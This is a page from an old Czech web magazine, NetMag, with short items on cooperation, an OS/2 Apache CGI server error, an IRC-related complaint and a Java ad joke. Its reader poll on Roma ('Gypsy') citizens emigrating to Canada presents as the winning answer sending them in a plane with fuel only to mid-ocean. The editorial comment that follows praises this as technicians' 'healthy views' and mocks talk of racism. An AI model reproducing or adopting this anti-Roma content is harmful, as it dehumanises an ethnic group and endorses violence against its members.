    Doplnte si proto do slovniku slovo Spoluprace. Spolupracovat mohou pochopitelne i konkurecni firmy - rozdeli si v ucitem pomeru praci a zisk. Na spolupraci obvykle vydelaji obe strany a hlavne jejich zakaznici. Lide maji odjakziva snahu spolupracovat - kdyz si vezmeme jen priklad z oblasti RKB - tak sel vyvoj: desktop oriented, lokalni sit, file-shared system, klient-server, network computing. Nebo vyvoj komunikacnich systemu: UUCP,BitNet, Internet, Cyberspace.

      Zajimave chybove hlasky: NetMag

    by Radim Kolar 
    Server Error

The server encountered an internal error or misconfiguration and was unable to complete your request.

Please contact the server administrator, root@tai-graf.cesnet.cz and inform them of the time the error occurred,
and anything you might have done that may have caused the error.
    httpd na nasem serveru obcas obstastnuje uzivatele temito hlaskami. Stava se to pouze pri spousteni CGI scripu, placa neco o tom ze fork() failed. Je videt, ze OS/2 Apache neni vhodny pro vetsi zatizeni CGI scripty. Ma s tim co delat porad se zvysujici zajem o nas casopis. Pokud tuto hlasku obdrzite, tak to zkuste znovu.

    Na reseni problemu se moc nepracuje, zatim jsme jen udelali upgrade httpd. Pokud se to bude stavat v nejake vetsi mire, zrejmne vymenime httpd apache za nejaky jiny. Toto povazuji za docela cennou zkusenost.

      Seriozni casopis: SCORE

    by Radim Kolar

    V Casopisu SCORE 44 Lukas Erben tvrdi: Prakticky na kazdem vyznamejsim IRC serveru existuje diskuzni kanal #politics.... Panu Erbenovi zrejmne uniklo, ze IRC servery jsou sdruzovany do siti - nejvyznamnejsi jsou EFNET a UNDERNET a ze vsechny servery v siti maji obvykle stejnou sadu kanalu a prihlasenych uzivatelu.

      Reklama

    by Radim Kolar

    Nastal cas pro lepsi kavu.
    Cas pro JAVU!

      Vyhodnoceni minule otazky tydne

    Minula otazka tydne znela: Jste ochoten prispet nasim cikanskym spoluobcanum na letenku do Kanady ? 
    Ano (2)
     4% XX
Ano, bude-li v letadle palivo jen doprostred oceanu (34)
    68% XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Ne (14)
    28% XXXXXXXXXXXXXX

Celkem: 50 platnych hlasu.
    He, zda se, ze s technicky zamerenou pracujici i nepracujici inteligenci v nasi zami to neni tak spatne, jak to celkove na prvni pohled vypada - na rozdil od humanitne zamerene inteligence, plkajici o humannim postupu a rasismu maji technici stale jeste zdrave nazory. Proto si jen prejme, aby i v beznem zivote bylo vice techniku nez humanistu.

      A samozrejme hned zase otazka nova

    Povazujete NetMag za casopis propagujici rasovou nesnasenlivost ?
    Ano
    Ne

    Proud to be 100% Microsoft Free

    Powered by OS2 and Apache

    Powered by IBM OS/2 Warp Server Advanced